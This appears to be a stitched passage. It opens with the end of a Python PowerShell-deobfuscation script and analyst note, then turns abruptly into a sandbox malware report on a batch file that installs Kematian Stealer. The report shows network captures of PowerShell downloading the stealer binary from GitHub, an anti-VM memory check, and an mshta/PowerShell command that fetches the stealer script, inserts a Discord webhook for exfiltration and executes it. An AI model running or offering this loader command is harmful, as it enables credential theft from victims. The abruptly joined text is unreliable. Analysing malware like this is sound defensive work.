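                  "DefineDynamicAssembly", "DefineDynamicModule", "DefineType", "DefineConstructor",
                  "DefineMethod", "SetImplementationFlags", "CreateType",
                  "GetDelegateForFunctionPointer"}


def deobfuscate(script: str) -> str:
    """Return the script with concatenated and case-mangled member names restored."""
    def join(m: re.Match) -> str:
        # keep the '.' or '::' accessor, glue the literal pieces together
        return m.group(1) + "".join(re.findall(r"'([^']*)'", m.group(2)))

    def recase(m: re.Match) -> str:
        return m.group(1) + CANONICAL.get(m.group(2).lower(), m.group(2))

    return QUOTED_MEMBER.sub(recase, CONCAT_MEMBER.sub(join, script))


def reflection_indicators(script: str) -> dict:
    """Reflection members and '<dll> <export>' pairs referenced by the cleaned script."""
    clean = deobfuscate(script)
    members = sorted(set(re.findall(r"[A-Za-z_]\w*", clean)) & REFLECTION_API)
    imports = sorted(set(re.findall(r"\b([A-Za-z0-9_]+\.dll)\s+([A-Za-z_]\w*)", clean)))
    return {"members": members, "native_imports": imports}


if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    print(reflection_indicators(SAMPLE))
```

The concatenation regex deliberately refuses to cross a line break inside a literal, so the truncated `('Sp` at the end of the first chunk is left alone rather than being glued to the next chunk. A quoted-member rewrite that only recases known names is enough here; a fuller normaliser would also fold `-join`, `[char]` arithmetic and format-string (`-f`) tricks, none of which this loader uses.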


                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                       7 | 192.168.2.7 | 49724 | 140.82.121.3 | 443 | 1888 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                       Timestamp | Bytes transferred | Direction | Data
                                       2024-07-03 16:08:52 UTC | 204 | OUT | GET /Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian.bin HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                      Host: github.com
                                       2024-07-03 16:08:52 UTC | 997 | IN | HTTP/1.1 302 Found
                                      Server: GitHub.com
                                      Date: Wed, 03 Jul 2024 16:08:52 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                      Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/561131198/03bdc8a9-2834-4aef-a1a7-2d28a7226bb3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240703%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240703T160852Z&X-Amz-Expires=300&X-Amz-Signature=bf5d6ce3b3c7757c8874a64bc623be15306ed51e51b0852229d79eee9986e509&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=561131198&response-content-disposition=attachment%3B%20filename%3Dkematian.bin&response-content-type=application%2Foctet-stream
                                      Cache-Control: no-cache
                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                      X-Frame-Options: deny
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 0
                                      Referrer-Policy: no-referrer-when-downgrade
                                       2024-07-03 16:08:52 UTC | 3025 | IN | Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                       8 | 192.168.2.7 | 49725 | 185.199.110.133 | 443 | 1888 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                       Timestamp | Bytes transferred | Direction | Data
                                       2024-07-03 16:08:53 UTC | 683 | OUT | GET /github-production-release-asset-2e65be/561131198/03bdc8a9-2834-4aef-a1a7-2d28a7226bb3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240703%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240703T160852Z&X-Amz-Expires=300&X-Amz-Signature=bf5d6ce3b3c7757c8874a64bc623be15306ed51e51b0852229d79eee9986e509&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=561131198&response-content-disposition=attachment%3B%20filename%3Dkematian.bin&response-content-type=application%2Foctet-stream HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                      Host: objects.githubusercontent.com
                                      Connection: Keep-Alive
                                       2024-07-03 16:08:53 UTC | 778 | IN | HTTP/1.1 200 OK
                                      Connection: close
                                      Content-Length: 3992755
                                      Content-Type: application/octet-stream
                                      Last-Modified: Sun, 30 Jun 2024 05:35:21 GMT
                                      ETag: "0x8DC98C66EE845A6"
                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                      x-ms-request-id: be5d7460-101e-0036-11af-ca6c25000000
                                      x-ms-version: 2020-10-02
                                      x-ms-creation-time: Sun, 30 Jun 2024 05:35:21 GMT
                                      x-ms-lease-status: unlocked
                                      x-ms-lease-state: available
                                      x-ms-blob-type: BlockBlob
                                      Content-Disposition: attachment; filename=kematian.bin
                                      x-ms-server-encrypted: true
                                      Via: 1.1 varnish, 1.1 varnish
                                      Accept-Ranges: bytes
                                      Age: 0
                                      Date: Wed, 03 Jul 2024 16:08:53 GMT
                                      X-Served-By: cache-iad-kcgs7200102-IAD, cache-nyc-kteb1890056-NYC
                                      X-Cache: HIT, MISS
                                      X-Cache-Hits: 1363, 0
                                      X-Timer: S1720022933.184402,VS0,VE42
                                       2024-07-03 16:08:53 UTC | 1378 | IN | Data Raw: e8 1d b8 3c 00 1d b8 3c 00 b3 2c 56 3d 24 16 24 68 1b c9 41 79 02 c4 75 c0 09 bc 22 bf c1 da 01 6f 6f 96 a7 ad a1 66 b7 49 00 00 00 00 ae b4 17 85 6f b6 2f 28 4e 11 7b 33 c7 79 42 b5 b9 10 82 42 8d 94 d0 e2 b5 de 1c c5 4a 48 29 de 7b 84 22 a4 29 2b 07 f1 c9 42 54 80 86 d5 e5 af f4 1c b4 3a 57 67 b9 29 c0 05 4f 8d 2a 9f a9 f8 65 67 ab 95 76 e1 ea d3 b2 63 36 7f fa a6 4b f0 7c a2 99 37 26 79 b8 fd 2e fe b3 b5 3f 49 db 42 0b 32 4f f4 bb 36 09 4b ca 51 97 45 d9 b9 3d e2 9d 3a 7d cf 4f 73 72 30 23 02 f4 c9 5a 63 a5 4b 0e f2 64 4c cf 73 64 65 15 ba c0 e9 cf 59 64 59 25 7a b6 1c 5c e6 ea b3 94 4e c9 d3 1f d9 98 9d 89 19 93 42 b2 55 8c b9 2a 03 a6 45 ce fc 34 e3 33 6e e5 3e 28 1b 7f 0d 86 0c ed 10 61 25 5f a6 bf db d3 d9 91 a0 72 9f 51 08 09 16 c1 d9 c0 64 22 cb
                                      Data Ascii: <<,V=$$hAyu"oofIo/(N{3yBBJH){")+BT:Wg)O*egvc6K|7&y.?IB2O6KQE=:}Osr0#ZcKdLsdeYdY%z\NBU*E43n>(a%_rQd"
                                       2024-07-03 16:08:53 UTC | 1378 | IN | Data Raw: 93 e2 3f 99 d7 8b 1e b2 17 d4 00 04 a4 7d 41 f7 4b 07 a4 96 1b 3c 67 f1 fd e6 71 41 df 51 db c7 5b e9 65 db 6e 0b 6c 3a b0 83 84 a2 65 69 96 a4 0e 57 5d a0 cc 3e cd 57 8a 7b 8e 8e 7a 9c cd 64 ed e6 ee 56 04 18 33 42 2a b6 fb b9 5c b6 70 37 af 0d 95 ed 9f 29 1d 42 79 16 e3 7e 1d a7 b9 fb 31 88 dd 1b 0a 34 70 1d b3 70 44 6f 41 c3 cd 58 09 ab f6 c7 30 2d dd 25 cc d9 9b d5 24 bb d0 09 da 00 67 53 31 6a 0e af fa 48 ba 22 6f f3 76 e0 05 b0 02 d9 03 7a 8d 2a b3 34 71 72 d9 a5 b5 f6 45 de 8e e6 2c 08 2b 0d d1 12 1f e7 57 9b 52 6f de 64 76 39 3b d6 33 d8 0e f4 5e 4c 46 75 99 de 86 19 3d 50 43 a5 9c fc f6 7c ec 18 85 fd 80 70 d9 38 12 89 7d 72 63 e9 66 25 e1 c0 6a 7a 22 ec 21 b3 11 af 66 fa fd 07 b8 fe 79 ed e1 73 be 59 99 c3 4b 44 49 3d d1 bb bf 41 ae c4 b4 63 83
                                      Data Ascii: ?}AK<gqAQ[enl:eiW]>W{zdV3B*\p7)By~14ppDoAX0-%$gS1jH"ovz*4qrE,+WRodv9;3^LFu=PC|p8}rcf%jz"!fysYKDI=Ac
                                       2024-07-03 16:08:53 UTC | 1378 | IN | Data Raw: 0c d1 29 06 cc 17 e7 93 e6 a6 53 8c 47 ee 8c 9b df 93 c1 cb 34 c4 3d 3f 87 f1 5f 88 3f 7b 77 84 1d 56 f5 aa 9f ce a3 20 9d 00 7a f5 3e 4d 2a cd 5f 77 15 a1 83 7c 51 7f 64 b6 08 47 f3 fc e6 d6 45 31 97 fb e9 05 55 cd 12 18 49 e4 54 90 96 7e a2 40 41 63 fa 39 1c 06 fe c5 7b 3e 05 95 8c ee ba 4c 90 7e b5 71 cc 80 c6 e8 92 55 82 91 5d 3f 2e e4 c1 69 14 67 bd 56 84 ed 91 85 2a d1 33 75 6b 93 f4 61 96 8a d5 34 44 83 d6 d1 45 e4 52 51 97 b8 be 50 85 e8 18 20 0d e7 92 2c 05 cc 12 6d 5c 8b fc 4f ae b3 37 f8 3e b6 a3 ad 55 d9 ee 97 7c c8 ac 97 bb f2 43 7a 00 e5 be 01 29 8f e1 16 4c ef 4e 00 65 54 63 6f ff 6c c8 94 64 a8 5c 7c 60 7e e6 ba f3 51 74 4e c7 14 22 a5 b1 28 9c 11 1f 74 c2 99 0b 25 6c 61 1f 81 22 0e 1c 51 f3 5c 1c 80 39 32 aa b3 9e d8 5d 92 a8 6b 68 e2 a3
                                      Data Ascii: )SG4=?_?{wV z>M*_w|QdGE1UIT~@Ac9{>L~qU]?.igV*3uka4DERQP ,m\O7>U|Cz)LNeTcold\|`~QtN"(t%la"Q\92]kh
                                       2024-07-03 16:08:53 UTC | 1378 | IN | Data Raw: a7 19 02 88 66 c3 90 0b 2d 36 14 8c c0 35 c4 b1 77 dd 16 7d 4a 8f 0b 20 7b f4 26 a3 64 1d c9 8f 20 43 24 20 fa 76 4f e5 7d c0 8c 2f d8 1e 24 90 ea fd 0f ac 14 58 fb e4 ff 0e 04 6f 62 f9 05 f1 86 82 67 be 7b 73 b9 5f 1d aa 8f 26 af 4b d8 bb 97 fe e0 da f5 fc 52 d9 14 af 98 2b 35 db f3 e8 5e 46 8f 5d ab 0e 3b 22 8a 53 3d 48 22 2b 2c 04 21 c4 95 29 0e 7e c5 e2 21 fe 96 a3 90 29 8c 5e ac 6a 89 0c 75 0d 72 e4 06 94 ac 00 55 1f a0 9f e3 cf b1 3c 8a cc d3 3f 95 2c ed 61 dd 8b ac e5 e0 26 9c 0f 97 05 54 ec 9a c2 0e 3f cc 7e 1b 5e 5c c5 3b 7c 84 0a 0a 45 b6 3a 24 66 a7 da 85 5c b2 15 a0 50 10 8c 4a 9c 60 9e 2a cf f4 70 86 b3 4f a2 0b c8 20 8d 50 73 47 fb cc 62 9b 20 99 2e a9 43 27 22 34 8e cc df dc 7f 74 47 9b 08 67 86 e7 69 22 26 54 c2 1b 2e 87 a4 f2 78 20 3b 4e
                                      Data Ascii: f-65w}J {&d C$ vO}/$Xobg{s_&KR+5^F];"S=H"+,!)~!)^jurU<?,a&T?~^\;|E:$f\PJ`*pO PsGb .C'"4tGgi"&T.x ;N
                                       2024-07-03 16:08:53 UTC | 1378 | IN | Data Raw: 9e b1 6c 33 53 d9 4a 09 25 7d c9 8a 12 09 43 0c 91 bb 0c d2 b1 59 05 44 0c af ad 38 76 d5 c6 d4 16 76 ad 6d 2b de 59 ff 8f f2 4d cd b5 05 b8 63 e3 51 f3 de eb 74 b2 18 58 ac 29 d4 3b 90 c3 80 34 49 8c 3a d1 8b d5 a7 ea 8e fa 0f 53 e3 d8 a3 bd db cf ec 27 db 2f 2d c0 bd 3d c1 d4 df 78 ee 6b d2 a7 6c e3 0d ac be 63 44 0a 95 72 c0 13 75 62 36 11 77 1c d7 f9 a9 35 15 d2 30 87 23 38 ff ab 35 3b 9f 3f 4d 06 78 bf fd e1 13 f6 55 38 13 32 d9 b1 56 a9 ca 0d d2 fd 30 fb 22 09 6f 68 ff a0 c0 f0 dd 9f 43 75 32 eb 27 e3 be fb 0c be 81 0f 85 f8 03 52 d5 cb 0e da 7b 55 f3 14 66 5a 1f 38 69 ed 2d c6 eb c0 81 de 38 a8 63 e9 50 4c 78 aa 73 33 59 be eb 1f 5e 30 bd a9 48 e1 00 52 ef 63 ae e3 c9 cf 42 a0 6d c2 92 92 22 8c 8f 95 04 1d 7c 8a 4d 89 bf 55 c9 43 8b 6c 59 42 2d 4d
                                      Data Ascii: l3SJ%}CYD8vvm+YMcQtX);4I:S'/-=xklcDrub6w50#85;?MxU82V0"ohCu2'R{UfZ8i-8cPLxs3Y^0HRcBm"|MUClYB-M
                                       2024-07-03 16:08:53 UTC | 1378 | IN | Data Raw: eb 9f 8e 7c f7 ff 3a ef 3d 12 11 b8 67 8a 61 22 7b 95 80 f8 77 ba 89 8a 0a 68 b6 73 9c 09 95 b5 97 9f 7e a8 5b 2b 5d a1 df 71 04 58 9c e6 21 44 c2 91 2c 0f a5 19 e2 9a 83 9c 8a b0 0d 42 69 1b 63 82 d7 1c 84 30 59 db 91 f1 88 44 34 8e a8 67 9d 27 df 79 9a a6 6a 07 02 cf f8 32 f3 16 33 4d 94 e2 f7 cb 93 89 f7 7a 49 54 2a a5 7b d7 6d 64 49 59 f1 94 60 5e 7b 14 d1 26 97 5f e7 4b 29 55 e0 ec cc 78 47 c1 68 70 24 8d 7d 15 1e cc 41 57 a5 4e 74 57 a5 77 78 b4 1f 6e d3 a7 de 29 4f 66 f5 73 cb 26 6b 04 ab e7 f1 09 0e a8 a3 1b 95 47 09 e1 10 e0 20 9a dc 5f 2f 6f 4d 41 cf 20 bb a8 9a b6 15 0d 15 1c ee 62 09 aa 73 c4 04 a7 7b 68 39 ec 59 be 1a 2f 87 c0 94 83 92 df 2d bb d2 a8 bd b9 3e f3 4a e2 5b 28 fc 63 f0 05 02 2f 3d 67 03 85 60 c8 26 63 4f 81 b4 d9 1d c7 80 48 7a
                                      Data Ascii: |:=ga"{whs~[+]qX!D,Bic0YD4g'yj23MzIT*{mdIY`^{&_K)UxGhp$}AWNtWwxn)Ofs&kG _/oMA bs{h9Y/->J[(c/=g`&cOHz
                                       2024-07-03 16:08:53 UTC | 1378 | IN | Data Raw: ce c2 2d 93 cd fd b2 d5 06 63 66 c0 8b 51 fe 93 3f eb fb f1 1d a0 54 4b d9 ea 93 3a a1 69 7f 07 bf cf ce 84 bb 3c 50 15 3a 1e 0e f0 20 f3 ef f2 7a c7 79 17 44 ff 96 2b b7 97 22 a2 2e bc 64 4f a5 14 8b 0d 13 30 b0 aa 71 c8 fa 73 36 bf 10 11 04 21 82 8e 76 14 c1 d0 89 e5 76 12 83 b7 65 be 6a ec 77 2a e0 18 24 c4 ee 8a 79 e7 ff 9f 28 61 60 22 3d 58 9d a4 38 31 95 a9 7c e9 dc 18 24 db 7f 1a a5 76 df 93 54 50 ff 11 f1 cc 02 10 d0 a2 32 fd 55 5c 27 4f 63 22 62 8e 60 6c 82 30 54 97 62 d2 f2 b1 4b 61 d0 61 88 53 74 5a 96 4e a4 21 cf f6 6d 6f 69 94 41 44 a4 61 7d 81 11 ee 42 d8 ae fa 43 4b d8 63 9f ba a1 a3 57 d7 f7 1f d9 fe 7a 07 0a c0 e2 52 97 c6 38 20 05 68 ee 57 e5 13 20 58 2d 29 f8 b9 28 c0 90 2b ce e4 19 44 04 6c 83 9d 85 4d 17 3d 0f 7a 61 83 80 26 eb c5 b7
                                      Data Ascii: -cfQ?TK:i<P: zyD+".dO0qs6!vvejw*$y(a`"=X81|$vTP2U\'Oc"b`l0TbKaaStZN!moiADa}BCKcWzR8 hW X-)(+DlM=za&
                                       2024-07-03 16:08:53 UTC | 1378 | IN | Data Raw: ff f6 57 35 b7 e0 9d c6 d7 b0 96 79 5b 33 86 f1 d6 f5 81 32 b6 44 19 fb 87 d5 21 6f 72 af 4c a7 ae fa e0 23 0e 3b 1d 9c 84 e2 01 f4 f4 21 74 84 87 d6 53 be d1 2f cb 4e 3a da a9 ac 3a e1 5c 2f 97 e8 09 91 b7 3d d4 9f d7 ab ba 35 1d 3f 1e e9 82 dc 99 87 f4 92 73 4f aa ea e5 d2 66 66 e0 05 98 bd 5c 84 81 7e d5 12 1d 7e 40 3a 21 e1 96 df 82 f4 2e e4 fd 81 32 79 ea d5 c4 dd 57 d8 13 a6 56 d5 b2 84 ce f6 56 0a 5c 6f e5 de e3 c9 86 a9 c7 52 78 b6 68 bf db 74 de 38 14 49 78 09 5d f6 af 3e 81 71 be 1c a7 65 61 1c 8b 4d b6 de 6d bd d9 d3 bf 11 3d 79 dc 7a a4 8e cb 30 9b 51 24 0b 68 54 75 31 34 52 d9 2b 71 e4 2a b7 0b 91 2f 51 79 9e 58 8f 75 d0 66 43 b7 d6 59 9f 5f ab c3 f3 90 f9 f0 a4 c1 e5 72 c6 28 8c 0c b4 14 54 05 ac 24 81 5d a1 c8 fc a1 f7 78 97 41 2d 91 3a a8
                                      Data Ascii: W5y[32D!orL#;!tS/N::\/=5?sOff\~~@:!.2yWVV\oRxht8Ix]>qeaMm=yz0Q$hTu14R+q*/QyXufCY_r(T$]xA-:
                                      2024-07-03 16:08:53 UTC1378INData Raw: 45 4a e4 07 1f 6b cc 49 5f 39 97 9e 6c 2a 7f be 98 2b 68 66 9e 2a 47 3e 72 67 6c 22 bc c1 08 96 fa 30 f3 0f 17 b0 20 c7 26 cf 80 b5 34 2a 91 ca b6 a6 16 4d 60 51 78 e7 b9 ec 2e 6f 75 19 d7 18 75 5a 29 ea 93 43 fc c4 34 0e 01 ee a5 0d 12 cd f6 73 9b 56 2e 97 34 7a 45 80 99 33 67 9e 40 1f e5 97 7b 58 c4 f7 4d 09 62 a8 04 65 aa a3 9a ad 54 2b e2 bc 8e bc 9e 9f 6c 7b a0 5d 68 b1 13 17 ba fb c2 f9 d0 57 ae 17 5c 62 0b 2b 95 4a 17 1c 8a 59 2e e6 b3 76 a8 45 93 fe 75 bd 78 3d ba 00 f6 25 76 b0 66 8a 21 f2 74 54 a9 7b 7a ae 43 ab ee 76 86 3f 9e 88 2e 01 4e 3a 30 63 08 b2 36 1a 44 dc bc 1d f9 aa 2f cb c7 cb 59 f0 38 bf d2 30 d1 59 bb f0 d8 cb 3b 2b 76 e7 10 8e fa fe 6b 00 4e 5e f4 35 f1 78 e0 38 03 c5 a3 03 f0 2f a1 cd 88 34 89 a2 a3 0e 72 44 58 84 30 1a 78 a2 29
                                      Data Ascii: EJkI_9l*+hf*G>rgl"0 &4*M`Qx.ouuZ)C4sV.4zE3g@{XMbeT+l{]hW\b+JY.vEux=%vf!tT{zCv?.N:0c6D/Y80Y;+vkN^5x8/4rDX0x)
                                      2024-07-03 16:08:53 UTC1378INData Raw: 25 06 2e 65 c1 09 02 f5 7e ea c3 d2 e6 e0 7b ae 30 73 a1 53 aa 94 4b 42 a4 46 57 8e 15 4f 39 e5 2c c3 25 14 05 81 12 14 d1 dc ac 08 b7 ab 11 43 4b eb 97 4a 28 31 53 9f 9c 51 73 f4 d8 69 37 4e ee 2a d8 e5 6b 00 7f 09 fc 13 32 46 56 fb d3 99 95 da 81 19 93 df 20 11 f8 1f 7b 52 8a 5f 28 4d 99 d0 9d 94 16 3f 30 34 0f e0 76 39 16 e5 2d cc f7 ae 9d 90 07 62 1b b4 15 bb 98 4e b9 9c 03 6c 2f a0 b9 a8 f5 d7 89 a2 8e c7 08 9c 4c 29 ac a8 16 df da 1d 88 f4 5b 28 0e 83 a1 c3 de d7 44 9c 7f dc 6e c0 bb be 6f 4c bd b0 9b ec 01 61 2f ec 0f f1 12 ad 78 27 cc 89 32 12 fe ba 02 fa 91 6c 8d 68 f5 c9 52 fd 03 b0 77 32 b0 b4 91 75 69 f1 45 c6 c9 9e 84 b2 0a 6e 4a da 5c dd 84 8a 79 5d 91 09 d5 1b fc fc 30 c7 c6 d7 10 08 38 42 87 73 dd 75 c9 df 5f 06 63 d7 e7 3d e5 8b 4f 1b 6f
                                      Data Ascii: %.e~{0sSKBFWO9,%CKJ(1SQsi7N*k2FV {R_(M?04v9-bNl/L)[(DnoLa/x'2lhRw2uiEnJ\y]08Bsu_c=Oo



                                      Target ID:6
                                      Start time:12:08:06
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\thegreatestexecutor.bat" "
                                      Imagebase:0x7ff680b50000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:7
                                      Start time:12:08:06
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff75da10000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:11
                                      Start time:12:08:06
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\findstr.exe
                                      Wow64 process (32bit):false
                                      Commandline:findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat"
                                      Imagebase:0x7ff712780000
                                      File size:36'352 bytes
                                      MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:12
                                      Start time:12:08:08
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
                                      Imagebase:0x7ff741d30000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:14
                                      Start time:12:08:19
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\findstr.exe
                                      Wow64 process (32bit):false
                                      Commandline:findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat"
                                      Imagebase:0x7ff712780000
                                      File size:36'352 bytes
                                      MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:15
                                      Start time:12:08:19
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\findstr.exe
                                      Wow64 process (32bit):false
                                      Commandline:findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat"
                                      Imagebase:0x7ff712780000
                                      File size:36'352 bytes
                                      MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:16
                                      Start time:12:08:21
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff77f030000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:17
                                      Start time:12:08:21
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\findstr.exe
                                      Wow64 process (32bit):false
                                      Commandline:findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat"
                                      Imagebase:0x7ff712780000
                                      File size:36'352 bytes
                                      MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:18
                                      Start time:12:08:21
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:powershell.exe -nop -c "Write-Host -NoNewLine $null"
                                      Imagebase:0x7ff741d30000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:19
                                      Start time:12:08:22
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:powershell.exe -nop -c "Write-Host -NoNewLine $null"
                                      Imagebase:0x7ff741d30000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:21
                                      Start time:12:08:24
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\rundll32.exe
                                      Wow64 process (32bit):false
                                      Commandline:rundll32
                                      Imagebase:0x7ff6b0d80000
                                      File size:71'680 bytes
                                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:22
                                      Start time:12:08:24
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\net.exe
                                      Wow64 process (32bit):false
                                      Commandline:net session
                                      Imagebase:0x7ff60b670000
                                      File size:59'904 bytes
                                      MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:23
                                      Start time:12:08:24
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\net1.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\net1 session
                                      Imagebase:0x7ff679f20000
                                      File size:183'808 bytes
                                      MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:24
                                      Start time:12:08:24
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\mshta.exe
                                      Wow64 process (32bit):false
                                      Commandline:mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0))
                                      Imagebase:0x7ff704180000
                                      File size:14'848 bytes
                                      MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:25
                                      Start time:12:08:25
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
